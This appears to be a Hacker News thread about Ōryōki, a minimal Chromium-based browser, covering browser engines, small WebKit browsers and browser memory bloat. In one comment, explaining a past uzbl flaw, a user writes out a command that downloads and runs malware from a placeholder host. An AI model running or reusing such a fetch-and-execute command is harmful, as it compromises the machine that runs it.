NetSurf actually is good. Most of the web is more-or-less usable with it (usually “less” but it's definitely bearable). It's stupid fast too. My only gripe is stability issues and that it's not officially supported on Windows.
On sites that require Javascript, it is useless, of course, and even moderately fancy CSS layouts look ... interesting in it. (OTOH, no Javascript means that it practically has a builtin adblocker.)
But for sites where that is not a problem, it is incredibly fast, plus one can have dozens of tabs open, and it will rarely if ever use more than 100 MB of RAM. For browsing documentation, it usually works perfectly well.
All of those are WebKit-based, which was Chromium's rendering engine until recently. The rest of Chromium is primarily UI and network code, along with their sandboxing system and extensions - WebKit's "ports" have their own implementation of said network code tying into the framework that they're porting to (GTK+ or Qt, usually), and all three browsers you list use the WebKitGTK+ port.
uzbl, the one I've used the most, primarily consists of a pile of code to map callbacks to a protocol on stdin/stdout, and a handful of example scripts to communicate over that protocol - it's certainly no more "from scratch" or smaller than any other WebKit-based browser.
I expect that the other two similarly focus on UI code rather than pointlessly fiddling with WebKitGTK+'s internals - how are they not just skins (albeit of WebKitGTK+, not Chromium) as well?
Depends on what you mean by independent. If you just mean not any of the big three and their derivatives, you've got Servo[0], although that's still a herculean effort with direct support from Mozilla in terms of paying people to work on it. On the other end of the spectrum, you've got things like Dillo[1], which don't support much modern HTML/CSS/scripting, but do seem to get on by with far less effort.
Well, you know how long you've been hearing about Servo, and how it still, to a first approximation, can't render the web? Yeah, they're also bringing up Rust next to it, but... yeah, that's how long it takes.
It wasn't easy ten years ago, and a modern browser is at least an order of magnitude more complicated (WebGL, more complicated CSS, JS support, heck I'm not even really counting JS JIT here...).
I wish they'd open source EdgeHTML. I suspect it's far lighter than Gecko or WebKit, given that its development basically started with “let's rip out half of Trident”.
There's h-smile (commercial) from Terra Informatica, that's used by a lot of antivirus vendors to implement desktop GUI software in HTML. The latest commercial branding for it is called Sciter.
You'd think so (I know I did!), but I was floored the first time I started up Xombrero and saw that with only one tab, it used less than a sixth of the memory that Chromium uses. Xombrero has quickly become my favorite browser, though I only used it in the first place because I couldn't get any other browser that both 1) was not sludge on the Raspberry Pi, and 2) supports the modern Web (HTML5, CSS3, JS, ...).
It's not perfect by any means, but it is now my favorite :)
Internally Blink and WebKit are also diverging reasonably rapidly.
As a specific example here is the project to re-architect how blink does it's painting:
https://www.chromium.org/blink/slimming-paint
More and more it feels that corporations have discovered that with FOSS, those that do the work get to define the standard. And thus they throw manhours upon manhours of churn at whatever market segment they hope to control.
> More and more it feels that corporations have discovered that with FOSS, those that do the work get to define the standard
Not quite - those that employ the maintainers define the standard, as shown multiple times by Red Hat (multiple projects) and by Apple with WebKit.
IIRC, before the Blink fork, Google was pushing more commits into WebKit compared to Apple, but there was a - let's call it a difference in perspective - on a feature a Google employee wanted to implement, someone with an @apple.com email said "no". I can't remember what the issue was, but this development unfolded on webkit mailing list.
Blink has diverged a fair amount. There are different new features, bug fixes and optimizations.
Most things based on Chromium also use more components of the Chromium stack than just Blink. For example, in WebKit multiprocess support and sandboxing is provided at a batteries-included level. But Blink just has the hooks for it, while the actual implementation of the process architecture is done by other aspects of Chromium.
This is not to say one way is better or worse, but rather that there's significant differences between being WebKit-based vs Chromium-based.
I know that. However, factually I'm correct by saying that Chromium doesn't use webkit. It doesn't matter if it's still largely the same, what matters is that blink diverged from webkit for variety of reasons.
Not really, the Chromium content/ layer is pretty much stuff that every browser implementor using blink (or previously, WebKit) would want. See http://www.chromium.org/developers/content-module for more info.
Seems like the market is moving to almost all second-tier browsers (e.g. Opera) building from Chromium. I think this is a positive development as it should strengthen the underlying code if more people use it as a standard and then innovate UI, tools, services and so forth on top of it. Similar to what you see with the custom Android flavors/knock offs/whatever you want to call them in China.
I can think of many reasons why folks would want to use a custom browser built on top of Chromium rather than Chrome. Take Opera for example - Adblock and VPN are two services that can live more efficiently deeper in the core versus the extension layer where they are on Chrome. And these are two services that Google does not want to promote any more than they have to in order not to shed users. Browser competition is great for the market, the last thing we want is to end up in an IE6 type situation (and yes it can happen to anybody, even Google).
I'm amazed no-one has mentioned "dwb" in this thread. Yet another webkit-based browser with vi-like keybindings, but also an extension manager and plugins such as adblock and requestpolicy. Entirely keyboard-driven.
uzbl sounded really cool, but the first major security issue with it made me extremely wary of the project. IIRC, the 'uzbl' object was not properly fenced off from site javascript, so sites one browsed could trivially do the functional equivalent of uzbl.run('wget http://bad.host/malware; ./malware');
I realise every codebase has security bugs, but that one gave me the chills, and suggested that perhaps security approach had not been though through by the devs.
Guessing from the context of this article, his statements, and your response, he was talking about theOryoki web browser authors who wrapped a browser in a UI framework to make a "small" browser. Apparently the number of UI widgets is what makes the difference between "small" and "full blown".
Sometimes it's discouraging to think about how RAM requirements keep going up. The laptop I bought in 1999 had 64 MB of RAM, and that was enough for a comfortable multitasking system (dual-booting between Windows 9x and Linux with a GUI) for about two years.
Now, we have this, paraphrased from the 2012 novel _Off to Be the Wizard_ by Scott Meyer. Phillip, a time traveler from 1984, asks, "What on earth can a person do with 4 gigabytes of RAM?" Martin, from 2012, answers, "Upgrade it immediately."
Of course, things do get better over time, and some of those improvements require more RAM. Still, I wonder how much of the increases in minimum RAM requirements are actual progress, and how much are just waste. Is there even a way to answer that question? If I were to set up a machine (even a VM) running Windows 98 and Red Hat Linux 6.0 today, it probably couldn't do much on the current Internet, so I wouldn't be able to fairly evaluate how much the operating systems have actually improved.
I ask myself this from time to time. It's hard to quantify quality, but I'm certain that the exponential increase of power in todays PC vs. that of a PC from the 90's is not reflected in an exponential improvement of the vast majority of software currently using this power. It seems that the more power that there is available, the sloppier the use of it. I wonder if someone already formulated some kind of law that describes this phenomenon :-)
This. I think about this all the time and discuss it at length with people. Lotus 123 could do things people use Google Sheets for today with a few orders of magnitude less processing power, memory, and network bandwidth. In terms of UX, a lot of the stuff was near-instant vs noticeably delayed today due to everything running in browsers.
I argue that the UX has actually gotten worse since software is becoming more bloated faster than the hardware improvements can keep up with. There are more layers of abstractions and VMs running VMs running VMs simulating DOMs listening for changes to objects to update models to trigger actions which bubble up to listeners which fire events which change data structures that eventually update some text on the screen. Consider what happens in the physical memory, at the hardware layer, to have a modern React app print a line of text when a text box is modified. Contrast this with what a terminal does and what happens in memory. Printing text to the screen in a "modern app" is now so complicated that it's effectively impossible for a human to determine the CPU instructions and memory manipulations required to do the things we're doing.
And what do we do? We make more transpilers, more frameworks, move more to the browser, split our systems across networks and around the world. Contrast saving a file to a floppy disk with uploading that same file to a "modern app" which stores it on S3 using Paperclip with Rails, as many modern apps do. Think about all the systems that file goes through, the network requests, the protocols involved, the standards required to make that happen, and the infrastructure which powers it all. Think about the data centers those VMs running that app run in, the people who oversee them, the tooling they need to run those systems. Think about all the project managers who had a hand in setting any of that up, the financial planning of each aspect, the development time spent.
Recall the time when one could reason about what goes on inside a computer at every level, when key presses registered immediately, when the memory allocations of applications and the OS they ran in made sense to humans. When it felt like magic instead of digging through a trash heap of ads to find the tiny sliver of what you needed.
what the hell are we actually even fixing anymore?
I've been hearing discouraging things from both architecture and silicon people at Intel. It seems like they lost direction, probably because of the recent explosion of mobile/ARM.
I know there are some changes in UIs and windowing systems that many people apparently consider indispensible improvements, but which I couldn't care less about. One example is the rise of compositing window managers. IIUC, a compositing window manager has to store a bitmap image of every window in RAM. But it would be fine with me if in this regard, our systems still worked like Windows XP, Mac OS 9, and X without something like Compiz, where things are drawn directly to the screen when necessary. That alone wouldn't get us back to a comfortable multitasking system in 64 MB of RAM, but it would be a start.
RAM is meant to be consumed. If your browser is using 50MB of RAM and has to swap every background tab to disk then you're not utilizing the resources of your computer, and getting a crappy user experience as a bonus.
If only that were a relevant remark. The tab with the linked Oryoki web page alone is using 250 megabytes for me. And a second tab of the same page is using an additional 230 megabytes.
Somehow I don't think that that's well utilized RAM for the ~350 kilobytes of web content. This page uses 200 megabytes as a tab, and HN isn't exactly a heavy page.
Seriously. I remember having 10s of tabs open in Firefox on an XP machine with 256MB RAM total, and it performed relatively well.
At first I was going to blame all of the garbage from rockstar brogrammers, but even the simple HN comment page tab is using 264MB of RAM on macOS. The browser itself uses an additional 208MB according to Chrome's task manager, not counting all of the extensions. Where is it all going? There's 10 lines of JS on this page and a tiny amount of CSS. Has Chrome become that bloated?
This is especially annoying when many modern "desktops" apps are just Chromium wrappers that bleed memory.
Does it really use all that memory or does it pre-allocate it and does its own memory management inside? Not that it’s better, but that would explain why it takes so much.
It's not really chrome's fault. Blame it on increased screen resolution, copious amounts of available ram and a requirement to prefer using less cpu than less ram. Which also has the nice effect of using less energy.
If you have ram and it is not being used, it is completely wasted, if you have cpu cycles and it is not being used you are just saving on battery and not over heating the laptop.
Maybe on 3 or 4K laptops. But aren't most 1388x768 or something equally dismal? Which isn't far off 1024x768. Anyways, a 1080p frame at 32bit depth is only 8MB.
Browsers are hardly low CPU, either. I'll see things idling at 10% of an i5. Which is like 200%+ of CPUs used for web browsing of yesteryear.
All this, and web pages are slower to respond. I recently used a page that loaded a grid of images. Changing by battery/throttling had a 2s impact on load time. CPU was pegged during that time.
Sure RAM is meant to be used, but not when the browser just consumes it forever, until it begins grinding to a halt. What could a browser POSSIBLY be doing with 4-500MB of RAM PER TAB? It's a huge problem, and extensions like The Great Suspender should not have to even exist.
Except we're not running an entire operating system in each tab. Everything starts fine, and then quickly consumes memory. How about we just stay fine? I've got entire operating systems running with less resources in VirtualBox.
Yes, RAM is meant to be consumed, but I still find it incredibly hard to believe that my browser NEEDS multiple gigabytes of memory. Regardless of how much I have to spare.
Is this a problem a browser can solve? I mean modern websites are so large with so many crappy stuff and always loading something in the background - if you have 15-20 tabs with similar background loading web sites your browser is bound to consume a lot of memory.
If I am not missing something obvious, aren't we blaming the wrong thing?
I see your point, but I don't find the state of things incredibly surprising anymore. Consider how huge modern web pages have grown, with a ton of poorly compressible media attachments, an embedded programming language that keeps track of plenty of state, and dozens of external resources that pull their own media and have their own state. Not to mention that we're in the middle of a responsiveness space race between browser vendors, and doing less CPU work by keeping more things in memory is one of the basic performance optimizations. With that said, as developers we have obviously been spoiled by the embarrassment of riches in terms of available hardware resources and have also contributed to the problem.
I understand your point, but there is inefficient vs. efficient use of resources. You could say it's ok to package a toothpick in a shoebox because cargo space is meant to be consumed.
When the ASCII text of a webpage is measured in tens of kilobytes, and the RAM in hundreds of megabytes, something is wrong.
I wonder if part of the solution is smarter caching at the OS level. Do all modern operating systems give the application a way to tell the OS, "This chunk of memory is a cache, so free it if it's needed for something else"? Of course, when the OS frees that memory, the app would need to know about that, so it can re-fetch or re-compute that cached data the next time it's needed.
They almost all do, yes. Android offers volatile ranges, OS X offers purgable pages, Windows offers MEM_RESET/MEM_RESET_UNDO. To my knowledge Linux is the only exception, because last time I checked they haven't merged Android's patches to enable the feature.
I have good gear but definitely not the latest and greatest of everything. My laptop is a macbook pro from 3 years ago. My desktop has an Intel 2600k and 16gb of ram. Both run on SSDs. I use my laptop for work. Rarely have less than 20 tabs open in chrome, which stays open for days/weeks at a time. I've got VMs running and xCode, sublime, ios simulator, bunch of terminals, bunch of node apps, couple corporate sec products and incremental backup software, etc, etc.... Not a single thing is slow about anything. And I'm anal about things being slow. I hate waiting for anything. Its the same on my older desktop, which I also game on. I don't shut down my browser before playing games to free up ram, or kill photoshop, etc.
Unused ram is useless ram. Its a problem when you're always out of ram. But get an SSD for the odd times you swap. You won't notice it. But either way, the only time my browser is slow is if I restart it and it loads my previous 20-30 tabs all at once. It'll do its thing for 10-20 seconds then done.
I get its a lot of ram but what I don't get is why this is impacting people so much? In this day and age most of what people do is in a browser. And if you only have a tab or two and you're working outside of your browser, and you think your browser is killing your computer? Maybe its time to upgrade or add some ram.
You can get 16gb of ram for $50/$60... I abuse my machines with multitasking all day and none of them feel slow because my browser uses too much ram. Both have 16gb.
To be fair, the biggest offender in all this IS javascript in webpages. Though even more Javascript in the browser UI isn't going to solve the Javascript problem when it comes to performances.
Anybody can shift+Esc on Chrome and see how Javascript heavy pages consume a shocking amount of Memory.
This page on HN has 5 lines of inline JavaScript. It downloaded ~25KB of content, over 5 HTTP requests (HTTP/2 even), 3 of which are images, all of which are GIF images < 100 x 100.
This tab is consuming 98 MB of RAM. I am in incognito mode, with no plugins.
While crazy site do crazy things with JS and have crazy bad user experiences (TMZ.com makes 700+ requests and takes over 90seconds to load), 98 MB of ram for a HN tab is ridiculous. This has very little to do with JS.
No an average HN page consumes less than 20MB on my computer. And you didn't tell us how much RAM TMZ.com is consuming, 165MB on my computer (a 4GB RAM , quad core N2940 laptop), so 8 times more RAM.
I agree completely. Taking buttons off of the GUI and using different hotkeys doesn't make a better web browser. You just end up with a browser for hipsters.
A lot of the hate here comes from the fact that there are people who are being creative, and you aren't. It's easy to shut people down...try to help them, instead. It's an experiment, made public. What's the purpose of shitting on it?
Don't you think that removing all the extensions, bookmark bars, and extraneous UI cruft will make this browser consume a lot less RAM? Seems logical to me.
How much of the overhead is actual overhead though? Operating systems know better than to store multiple identical copies of the same shared library in memory, for example. And it's not like the process-per-tab approach has no benefits - you use more RAM to get increased reliability and security in return.
We'd need a sandboxing and module system for Javascript to solve this. A problem that is both technically complex and not 'sexy', so don't hold your breath.
Don't assume everybody uses their computer like you do and only runs one browser maximized on their only monitor connected to their powerhouse of a computer equipped with a last-gen CPU and 64 gigabytes of ram.
For example, I sometimes play very resource-hungry games and like to have a youtube video on my second monitor while I play. But that's not possible on my gaming PC, so I have to youtube-dl the video first and run it in vlc instead.
That seems like exactly what you are doing. So you want to run a game and a youtube video and browse at the same time, while on a low end PC. Cool. A lot of people don't use their computer like that.
What kind of ridiculous, fallacious logic is this?
First of all, it's not a low end PC, it's an expensive gaming-dedicated rig barely a couple of years old. The amount of resources browsers consume is just ridiculously high.
Second, the argument that browsers should use all the resources and ram available in the world only holds if your computer is dedicated to web browsing. This is quite obviously false - I shouldn't even have to give you my case as an example. PCs are general computing machines.
Web browsers are too hungry for what they do. Not every tab is meant to run a full blown web app with webgl and megabytes of javascript code. The point I was making was that what I'm not able to do with Firefox/Chrome, I'm able to do with vlc. That is preposterous for something that wants to be "the future of the desktop".
This page is a good example of what's wrong with HN.
Someone publishes their open source experiment in minimal browser UI design, and everyone shits on it for not being a built-from-scratch web browser with low memory usage.
I posted this elsewhere, but since a lot of people seem genuinely confused about why someone would want a project like this, I'll say it again.
I use `chromium --kiosk-mode` as my daily browser. Chromium has features I value highly (e.g. great devtools, doesn't constantly crash like webkit), but I'd rather have a more minimalistic user interface (less space devoted to chrome I don't want to waste screen real estate on).
Note that this preference is completely orthogonal to the desire to have a lighter weight, more minimalistic browser in terms of codebase, memory usage, etc.
This is a good example of what is right with HN. Technical people expressing their technical demands w/r/t a technical project. If you want people to ooh and ahh over a project and keep quiet about its faults, show it your relatives.
Someone built an experiment in minimalistic UI design. "Technical people" started a massive pile-on, declaring "this is stupid, this doesn't have a minimalistic codebase at all."
That's not a technical demand, and it's not identifying a product's faults. That's a demand that this project have an entirely different purpose.
Personally, I use `chromium --kiosk-mode` as my everyday browser, and this project looks like something I'd be interested in if I were on a compatible OS. Not a small codebase, not a lightweight browser, but that's not what I care about. I want something that has Chrome's features (great devtools, doesn't crash every hour like the webkit browsers I've tried) but with less UI devoted to, uh, chrome that I don't use or want or need.
> Someone built an experiment in minimalistic UI design. "Technical people" started a massive pile-on, declaring "this is stupid, this doesn't have a minimalistic codebase at all."
Yeah, we're criticizing the fourth word of the very first sentence of their webpage, explaining what this is:
"Ōryōki is a small web browser with a thin interface."
There's nothing small about Chromium, and adding layers onto something doesn't make it smaller. Unless they're talking about how small you can make the browser window, it's a false claim that should have been excluded from the description.
The warranted response is obviously a mix of technical and product-based critique. But you would be foolish to expect every comment to convey this mix.
Why should this be wrong? People can be who they want to be. If something is cool it's appreciated, if it's not, it's been shit on. That's life, deal with it. Not everyone is made of porcelain. Some are able to deal with critisism even if it's not delivered like it's taught in management classes.
This is a common objection that does carry some weight, but turns out not to hold in HN's context. In a large, semi-anonymous, weakly cohesive internet forum, the behavior referred to in this thread as "shitting" propagates into a force that's destructive of the community. The best people begin to leave, the shit piles up, and soon we're in a death spiral.
That's the #1 risk to HN, so we worry about it. Like many here, we've seen it happen before, and HN was literally founded on the idea of not letting it happen again—or at least trying to stave it off.
That doesn't mean we don't get the value of hard-hitting technical critique done in a right context; it means that HN is not a right context for the shitting variety. Nor do we ask users to be namby-pamby milquetoasts; we ask them to understand enough about the fragility of the community to preserve it for the future. We don't want a scorched-earth outcome.
So go ahead and make clear technical criticisms, but make them without the extra jabs that people often feel compelled to stick in. That latter behavior isn't hard technical critique anyhow, just chest-beating.
Unfortunately that's how the real world is when you ask people to spend their time to look at what you've done. They are going to look at it for exactly 10 seconds and tell you it sucks or that they have no use for it.
If HN (or any other website) turns into a "Its OK, you're among friends here" type of auto-fawning community, it would delude people into thinking they're actually doing something worth showing to people as opposed to hacking on a hobby project for their own enjoyment. (This isn't specific to the linked project)
For Firefox users, this can all be done with Firefox and custom browser CSS (Vimperator helps), which offers significantly more control (without having to rewrite the core code).
Would be useful to add an "MacOS" label (or Linux/Win) to the HN links when the tools are for a specific OS only, so that users of other OSes don't have to spend their clicks. At least for this project it is straightforward, sometimes it takes a few minutes on a website to find that, well, you can't uset it unless you buy a new computer.
At a previous job, we built and installed and ran a system test with that faster than Firefox unpacked the source tarball. OTOH, it's quite limited, and Javascript support isn't really there yet.
The typical web browser UI is a terrible waste of pixels. It might be a requirement for non-techies but no-one surely clicks the back button or drags the scroll bar, at least no power user does.
I personally use Firefox + vimperator with menu bar, address bar and scroll bars disabled. A single line status bar has all the info I need.
I've also dabbled with some of the "micro browsers" but none was satisfactory without a lot of trouble configuring proxies, etc.
For the future, I am hoping that someone will put together a Servo based micro browser with a keyboard oriented user interface.
> It might be a requirement for non-techies but no-one surely clicks the back button or drags the scroll bar, at least no power user does.
IIRC, back button is one of the most used UI elements of a browser.
I'd probably consider myself a power user (I work on browsers for a living), and I use and most of the features you've described. Especially scrollbars, they're a great "read progress" indicator.
On a side note, we so often forget how small is the bubble of the so-called "power users".
I fully support innovation in terms of a new web browser... but this isn't really what I'd like to see. I feel like the web browser should be more of an OS than what it is today. Why does the language attribute in the script tag only support javascript? Wouldn't it be rad if I could write C#, and not have to transpile it... wouldn't it be rad if browsers could add more language support automatically (with your permission first). So if you go to hipster.io and they've decided to develop their whole client side in lisp, but you don't have support yet it goes to mozillas module repository and downloads the plugin? Wouldn't it be rad if jquery was installed as a module, and you only downloaded it once for ALL sites, and you only redownload it if the site's version is different/customized...
That last one is already implemented with browser caching. Go to a popular website and check the Requests tab on your dev console, it'll probably show 304s for CDNs. But possibly some companies join many JS files together before publishing.
That requires you (as a site author) choosing between two evils, however - even though there no real technical reason why you should have to: Either copy framework-of-your-choice.js to your own host and accept duplication - or serve it from the framework's CDN and get great caching but also accept that you don't have any control anymore what scripts run on your page.
I really like the draggable windows, and the shortcuts for hiding and showing things. And the omnibox is, like, perfect; that's all I want.
But browsing a little, I immediately had problems zooming the viewport or increasing font size. Zoom gestures don't work, and neither does ⌘+/-. I couldn't find anything in the menu for it. Double-click on text does a zoom, but not enough. And sometimes content is moved off the viewport when you zoom in.
Very cool project.
edit: I'm still playing with it... it's got nice little notifications at the top. When you click a link, it says "loading...", then "850ms", or whatever; the page load time. And then ⌘← to navigate back shows "Navigating back", "Loading...", page load. It's cool. Looks nice. Dev tools open in a new window, and I couldn't find a way to open them in a panel, but maybe that can be set in the preferences.json.
Maybe I'm ignorant but having Electron on top of Chromium sounds somewhat redundant to me. Don't they both have the same core more or less? I mean V8 and Blink?
Making a web browser is hard. You will be dealing with sensitive information, your credentials, etc. Security-wise it is very hard to produce a sandboxed environment. Chromium might provide this to some extent but building on top of it might not magically preserve the same level of security.
http://surf.suckless.org/
https://fanglingsu.github.io/vimb/
http://www.uzbl.org/